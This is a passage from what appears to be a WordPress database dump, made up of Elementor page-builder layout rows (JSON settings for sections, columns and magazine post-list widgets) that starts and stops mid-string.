ontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1151,419,'_elementor_version','0.4'),(1152,419,'_elementor_css','a:3:{s:4:\"time\";i:1508855804;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1179,433,'_elementor_edit_mode','builder'),(1180,433,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,